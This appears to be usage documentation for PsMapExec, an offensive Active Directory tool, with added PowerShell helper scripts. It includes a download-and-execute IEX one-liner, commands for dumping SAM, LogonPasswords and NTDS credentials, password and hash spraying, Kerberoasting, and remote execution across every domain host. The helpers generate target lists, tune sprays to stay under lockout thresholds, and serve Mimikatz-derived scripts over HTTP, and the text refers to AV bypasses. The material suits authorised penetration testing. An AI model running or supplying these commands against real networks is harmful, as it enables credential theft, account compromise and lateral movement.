PsMapExec

Get it on GitHub: https://github.com/The-Viper-One/PsMapExec

# Load directly into memory and execute
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

Usage Examples

# Execute WMI commands over all systems in the domain using password authentication
PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command "net user"

# Execute WinRM commands over all systems in the domain using hash authentication
PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command "net user"

# Check RDP access against workstations in the domain using local account authentication
PsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth

# Dump SAM on a single system over SMB, using a Kerberos ticket (-Ticket) for authentication
PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Check SMB signing on all domain systems and generate a relay target list
PsMapExec -Targets All -Method GenRelayList

# Dump LogonPasswords on all Domain Controllers over WinRM
PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords

# Use WMI to check the current user's admin access on systems read from a text file
PsMapExec -Targets C:\temp\Systems.txt -Method WMI

# Spray passwords across all accounts in the domain
PsMapExec -Method Spray -SprayPassword [Password]

# Spray Hashes across all accounts in the domain
PsMapExec -Method Spray -SprayHash [Hash]

# Spray Hashes across all Domain Admin group users
PsMapExec -Targets "Domain Admins" -Method Spray -SprayHash [Hash]

# Kerberoast 
PsMapExec -Method Kerberoast -ShowOutput

# Check IPMI against a subnet
PsMapExec -Targets 192.168.1.0/24 -Method IPMI
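The text-file form of -Targets above takes a plain list of hosts. As an added example, not part of PsMapExec or its documentation, the following PowerShell builds such a file from LDAP with the .NET DirectorySearcher, so it works from any domain-joined host without the RSAT ActiveDirectory module. The output path, the 90-day staleness cutoff, the -ServersOnly filter and the one-hostname-per-line layout are assumptions made for this example.

```powershell
# Added example (not PsMapExec code): build a target file for "PsMapExec -Targets <file>"
# from LDAP. Assumptions: run as a domain user from a domain-joined host; PsMapExec reads
# one hostname per line; the output path and staleness cutoff below are arbitrary.
param(
    [string]$OutFile   = 'C:\temp\Systems.txt',
    [int]$StaleDays    = 90,      # skip machines with no logon in this many days
    [switch]$ServersOnly          # keep only Windows Server operating systems
)

# Bind to the current domain's default naming context.
$rootDse = [ADSI]'LDAP://RootDSE'
$base    = [ADSI]('LDAP://' + $rootDse.defaultNamingContext)

# Enabled computer objects only: userAccountControl bit 2 (ACCOUNTDISABLE) must be clear.
$filter = '(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
if ($ServersOnly) { $filter = "(&$filter(operatingSystem=*Server*))" }

$searcher = New-Object System.DirectoryServices.DirectorySearcher($base, $filter)
$searcher.PageSize = 1000         # paged search so large domains return every object
[void]$searcher.PropertiesToLoad.AddRange([string[]]@('dNSHostName', 'lastLogonTimestamp'))

# lastLogonTimestamp is a FILETIME (100-ns intervals since 1601); compare as Int64.
# Machines that never logged on carry no value and are skipped as well.
$cutoff  = (Get-Date).AddDays(-$StaleDays).ToFileTimeUtc()
$targets = foreach ($r in $searcher.FindAll()) {
    $p = $r.Properties
    if ($p['dnshostname'].Count -eq 0) { continue }          # no DNS name, nothing to connect to
    $lastLogon = if ($p['lastlogontimestamp'].Count -gt 0) { [int64]$p['lastlogontimestamp'][0] } else { 0 }
    if ($lastLogon -lt $cutoff) { continue }
    [string]$p['dnshostname'][0]
}

$dir = Split-Path -Parent $OutFile
if ($dir -and -not (Test-Path -LiteralPath $dir)) { New-Item -ItemType Directory -Path $dir | Out-Null }
$targets | Sort-Object -Unique | Set-Content -Path $OutFile -Encoding ASCII
Write-Host ('{0} targets written to {1}' -f @($targets).Count, $OutFile)

# Then, for example:
#   PsMapExec -Targets $OutFile -Method WMI
```

The replicated lastLogonTimestamp is only accurate to roughly 14 days, which is fine for dropping decommissioned machines but not for anything tighter; raise -StaleDays rather than lowering it if hosts you expect are missing.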

Usage Parameters

General Parameters

Parameter | Value | Description
--- | --- | ---
-Command | whoami | Runs the specified command on the remote system
-CurrentUser | N/A | Runs PsMapExec in the current user's context. This is the default when no other credentials are specified
-Domain | [Domain] | Domain to run against. Defaults to the current user's domain
-DomainController | [DC] | Domain controller to authenticate against
-Force | N/A | Forces PsMapExec to run when Domain Admin or Enterprise Admin credentials are used
-Flush | N/A | Flushes the cached LDAP results. Mostly only needed in a long-running shell in a large environment where computers and users are added to the domain over time
-LocalFileServer | [IP] | Pulls the dependency scripts from the specified local file server instead of GitHub
-Module | [Module] | Module to run (for example SAM, LogonPasswords or NTDS)
-NoBanner | N/A | Suppresses the script banner
-NoParse | N/A | Suppresses parsing of some module outputs
-Rainbow | N/A | Looks up hashes dumped by the SAM, LogonPasswords and NTDS modules in an online rainbow table. Note that this sends the dumped hashes to an external service
-SuccessOnly | N/A | Shows only successful results
-Timeout | [int] | Port scan timeout in milliseconds for the specified method
-Threads | [int] | Number of concurrent execution jobs (default: 30)

Authentication Parameters

Parameter | Value | Description
--- | --- | ---
-Hash | [RC4] or [AES256] | Hash value (NT/RC4 or AES256 key) to authenticate with. Must be supplied with -Username
-LocalAuth | N/A | Authenticate with a local account instead of a domain account
-Password | [Password] | Password to authenticate with. Must be supplied with -Username
-Ticket | [Ticket] or [Path to ticket] | Base64-encoded Kerberos ticket (or path to a ticket file) to authenticate with. -Username is not required

Command execution Parameters

Parameter | Value | Description
--- | --- | ---
-Command | [Command] | Runs the specified command on the remote system
-Module | [Module] | Specifies the module to be used for command execution
-ShowOutput | N/A | Displays output for executed modules. Command output is shown regardless

Spraying Parameters

Parameter | Value | Description
--- | --- | ---
-AccountAsPassword | N/A | Sprays each account's sAMAccountName as its password
-EmptyPassword | N/A | Sprays blank passwords
-SprayHash | [RC4] or [AES256] | Hash value to be used for hash spraying
-SprayPassword | [Password] | Password value to be used for password spraying
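Each -Method Spray run tries a single -SprayPassword or -SprayHash value against every account, so the number of runs inside one lockout observation window has to stay below the domain's lockout threshold or the spray locks users out. As an added example (not PsMapExec code), the following PowerShell reads lockoutThreshold, lockoutDuration and lockOutObservationWindow from the domain head and turns them into a spray budget. It assumes a domain-joined host and any domain user; the Get-SprayBudget function and its one-attempt margin are this example's own, and fine-grained password policies (msDS-PasswordSettings objects), which can override these values for specific users or groups, are not checked.

```powershell
# Added example, not PsMapExec code: read the domain account lockout policy before spraying.
# Assumptions: run as any domain user from a domain-joined host (these attributes are
# readable by Authenticated Users); fine-grained password policies are not checked here.

function Get-DomainLockoutPolicy {
    $rootDse    = [ADSI]'LDAP://RootDSE'
    $domainHead = [ADSI]('LDAP://' + $rootDse.defaultNamingContext)

    # Base-scope search on the domain head. DirectorySearcher returns large-integer
    # attributes as Int64, avoiding the IADsLargeInteger COM object that ADSI hands back.
    $searcher = New-Object System.DirectoryServices.DirectorySearcher(
        $domainHead, '(objectClass=domainDNS)',
        [string[]]@('lockoutThreshold', 'lockoutDuration', 'lockOutObservationWindow'))
    $searcher.SearchScope = [System.DirectoryServices.SearchScope]::Base
    $p = $searcher.FindOne().Properties

    # Durations are stored as negative counts of 100-nanosecond intervals. Int64.MinValue
    # in lockoutDuration means "locked until an administrator unlocks the account".
    $ticksPerMinute = 600000000
    $threshold = [int]$p['lockoutthreshold'][0]
    $window    = [int64]$p['lockoutobservationwindow'][0]
    $duration  = [int64]$p['lockoutduration'][0]
    $durationText = if ($duration -eq [int64]::MinValue) { 'until an administrator unlocks' } else { '{0} minutes' -f ([math]::Abs($duration) / $ticksPerMinute) }

    [pscustomobject]@{
        LockoutThreshold         = $threshold                                # 0 = lockout disabled
        ObservationWindowMinutes = [math]::Abs($window) / $ticksPerMinute
        LockoutDuration          = $durationText
    }
}

function Get-SprayBudget {
    # Spray passes (one -SprayPassword/-SprayHash value each) that fit in one observation
    # window. lockoutThreshold bad attempts lock the account, so threshold-1 is the absolute
    # maximum; $Margin is held back for the users' own mistyped logons in the same window.
    param([Parameter(Mandatory)]$Policy, [int]$Margin = 1)
    if ($Policy.LockoutThreshold -eq 0) { return [int]::MaxValue }
    return [math]::Max(0, $Policy.LockoutThreshold - 1 - $Margin)
}

$policy = Get-DomainLockoutPolicy
$policy | Format-List
$passes = Get-SprayBudget -Policy $policy
if ($policy.LockoutThreshold -eq 0) {
    Write-Host 'Account lockout is disabled at the domain level; spraying will not lock accounts out.'
} elseif ($passes -eq 0) {
    Write-Warning 'Lockout threshold leaves no room: do not run -Method Spray in this domain.'
} else {
    Write-Host ('At most {0} spray pass(es) per {1}-minute observation window, e.g.:' -f $passes, $policy.ObservationWindowMinutes)
    Write-Host '  PsMapExec -Method Spray -SprayPassword [Password] -SuccessOnly'
}
```

Accounts already carrying a non-zero badPwdCount eat into this budget, and a PSO applied to, say, Domain Admins can set a lower threshold than the domain default, so the figure is an upper bound rather than a guarantee.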

Most of these methods and modules have their own documentation pages with more detail (see the per-method and per-module pages in this documentation).

Generally, you can mix and match various parameters across different methods and modules.

Dependencies

PsMapExec has some dependencies that need to be pulled from outside the script itself in order to function.

Primarily these are:

  • Kirby (PowerShell-based Kerberos ticket dump)

  • Invoke-Pandemonium (Slightly modified Mimikatz)

The long-term plan is for PsMapExec to need no external dependencies, but that requires shrinking the script substantially and taking the AV bypasses into account.

Currently, they are pulled from a separate GitHub repository: https://github.com/The-Viper-One/PME-Scripts

If you are working in an environment with no external access, or GitHub is blocked by a firewall, clone the scripts in that repository onto a host you control and serve them over HTTP. PsMapExec does not currently host an HTTP server for them itself, so you will need something like HFS: https://www.rejetto.com/hfs/?f=dl

PsMapExec supports pointing to a locally or alternatively hosted server for the script dependencies.

PsMapExec -Targets All -Username [User] -Password [Pass] -LocalFileServer [IP]
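As an added example, not PsMapExec or PME-Scripts code, the following PowerShell is a minimal static HTTP server built on System.Net.HttpListener that can stand in for HFS on the host you point -LocalFileServer at. It assumes the PME-Scripts repository has been cloned into C:\PME-Scripts, that PsMapExec requests each dependency by file name directly under http://<IP>/ (this page shows -LocalFileServer taking only an IP, so port 80 is assumed; the exact paths PsMapExec requests are not stated here, so check the listener's request log and adjust $Root if a fetch 404s), and that the port is reachable from the host running PsMapExec.

```powershell
# Added example, not PsMapExec or PME-Scripts code: serve the cloned dependency scripts over
# plain HTTP for a network that cannot reach GitHub. Assumptions: PME-Scripts is cloned into
# $Root; PsMapExec fetches each script as http://<IP>/<Name>.ps1 when given -LocalFileServer
# <IP> (port 80 assumed). HttpListener needs an elevated shell or a URL reservation first:
#   netsh http add urlacl url=http://+:80/ user=Everyone
param(
    [string]$Root = 'C:\PME-Scripts',
    [int]$Port    = 80
)

$Root = (Resolve-Path -LiteralPath $Root).ProviderPath.TrimEnd('\') + '\'
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add("http://+:$Port/")
$listener.Start()
Write-Host "Serving *.ps1 from $Root on port $Port. Ctrl+C stops the server."

try {
    while ($listener.IsListening) {
        # Wait in short slices instead of blocking in GetContext so Ctrl+C is honoured.
        $pending = $listener.BeginGetContext($null, $null)
        while (-not $pending.AsyncWaitHandle.WaitOne(500)) { }
        $ctx = $listener.EndGetContext($pending)
        $req = $ctx.Request
        $res = $ctx.Response
        try {
            # Map the URL path onto $Root after decoding and normalising it, then refuse
            # anything that escapes the root (../, encoded separators, absolute paths) or
            # is not a PowerShell script. Only GET is served.
            $rel    = [Uri]::UnescapeDataString($req.Url.AbsolutePath.TrimStart('/'))
            $full   = [IO.Path]::GetFullPath([IO.Path]::Combine($Root, $rel))
            $inside = $full.StartsWith($Root, [StringComparison]::OrdinalIgnoreCase)
            $isPs1  = [IO.Path]::GetExtension($full) -eq '.ps1'
            if ($req.HttpMethod -eq 'GET' -and $inside -and $isPs1 -and (Test-Path -LiteralPath $full -PathType Leaf)) {
                $bytes = [IO.File]::ReadAllBytes($full)
                $res.StatusCode      = 200
                $res.ContentType     = 'text/plain'
                $res.ContentLength64 = $bytes.Length
                $res.OutputStream.Write($bytes, 0, $bytes.Length)
            } else {
                $res.StatusCode = 404
            }
            # Request log: shows exactly which paths PsMapExec asks for.
            Write-Host ('{0} {1} {2} -> {3}' -f (Get-Date -Format 'HH:mm:ss'), $req.RemoteEndPoint, $req.RawUrl, $res.StatusCode)
        } catch {
            $res.StatusCode = 500
        } finally {
            $res.Close()    # flushes the body, or sends the bare 404/500 headers
        }
    }
} finally {
    $listener.Stop()
}
```

Because the server hands out Mimikatz-derived scripts in clear text to anyone who can reach it, bind it only for as long as the engagement needs it and stop it afterwards; the Stop in the outer finally runs on Ctrl+C.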
